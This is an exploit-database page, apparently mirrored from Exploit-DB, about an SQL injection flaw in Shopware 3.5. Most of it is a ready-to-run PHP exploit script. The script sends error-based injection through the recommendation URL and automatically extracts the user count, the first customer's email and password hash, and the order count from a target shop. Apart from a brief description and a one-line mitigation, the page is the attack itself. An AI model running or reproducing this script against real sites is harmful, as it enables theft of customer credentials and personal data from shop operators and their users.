header-logo
Suggest Exploit
vendor:
Shopware
by:
Kataklysmos
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Shopware
Affected Version From: 3.5
Affected Version To: 3.5
Patch Exists: NO
Related CWE: N/A
CPE: a:shopware:shopware:3.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Shopware 3.5 – SQL Injection

Shopware 3.5 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries into the vulnerable parameter of the application and gain access to sensitive information stored in the database.

Mitigation:

Input validation and parameterized queries should be used to prevent SQL Injection.
Source

Exploit-DB raw data:

#!/usr/bin/php
<?php

#  Exploit Title: Shopware 3.5 - SQL Injection
#  Date: 13.07.2012
#  Exploit Author: Kataklysmos
#  Software Link: http://www.shopware.de/
#  Version: 3.5


function http_req($host, $q)
{
  if(!$fs = fsockopen($host, 80))
    exit("Could not open HTTP- Connection to ".$host."\r\n\r\n");
  
  $head  = "GET /recommendation/bought/article/".urlencode("0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (".$q.") FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM `information_schema`.`tables` GROUP BY x) z)")." HTTP/1.1\r\n";
  $head .= "Host: ".$host."\r\n";
  $head .= "Connection: Close\r\n\r\n";
  
  fwrite($fs, $head);
  
  $ret = '';
  while(!feof($fs))
    $ret .= fgets($fs, 4096);
  fclose($fs);
  
  return $ret;
}

function mask($cont)
{
  if(preg_match('/Duplicate entry \'(.*)1\' for/', $cont, $m))
    return $m[1];
  else
    return false;
}

function space($x)
{
  $r = '';
  for($i = 0; $i < $x; $i++)
    $r .= ' ';
  return $r;
}

echo "\r\nExploit Title: Shopware 3.5 - SQL Injection\r\n";
echo "Date: 13.07.2012\r\n";
echo "Exploit Author: Kataklysmos\r\n";
echo "Software Link: http://www.shopware.de/\r\n";
echo "Version: 3.5\r\n\r\n";

if(!isset($argv[2]))
{
  echo "  Usage: \r\n";
  echo "  ".$argv[0]." HOST --auto\r\n";
  echo "  ".$argv[0]." www.shopwaredemo.de --auto\r\n\r\n";
  echo "  ".$argv[0]." HOST QUERY\r\n";
  echo "  ".$argv[0]." www.shopwaredemo.de \"SELECT COUNT(`id`) FROM `s_user`\"\r\n";
  echo "  ".$argv[0]." www.shopwaredemo.de \"SELECT `email` FROM `s_user` LIMIT 0,1\"\r\n\r\n";
  exit(1);
}

if($argv[2] != '--auto')
{
  $x = http_req($argv[1], $argv[2]);

  if(!$x = mask($x))
    exit("Your query failed!\r\n\r\n");

  echo "Query:\r\n  ".$argv[2]."\r\nReturn:\r\n  ".$x."\r\n\r\n";
}
else
{
  $task = array(array('Amount of registered users', 'SELECT COUNT(`id`) FROM `s_user`', null),
                array('E- Mail from first user', 'SELECT `email` FROM `s_user` ORDER BY `id` LIMIT 0,1', null),
                array('Password from first user', 'SELECT `password` FROM `s_user` LIMIT 0,1', null),
                array('Amount of orders', 'SELECT COUNT(`id`) FROM `s_order`', null)
                );
  
  for($i = 0; $i < count($task); $i++)
  {
    echo "[ .. ] Task: \"".$task[$i][0]."\"";
    
    $x = http_req($argv[1], $task[$i][1]);
    if(!$x = mask($x))
      echo "\r[fail] Task: \"".$task[$i][0]."\"\r\n";
    else
    {
      echo "\r[ ok ] Task: \"".$task[$i][0]."\"\r\n";
      $task[$i][2] = $x;
    }
  }
  echo "\r\n";
  
  for($i = 0; $i < count($task); $i++)
    echo $task[$i][0].space(26-strlen($task[$i][0])).' : '.$task[$i][2]."\r\n";
  
  echo "\r\n";
}

?>

Navigation

Suggest Exploit

Services By CQR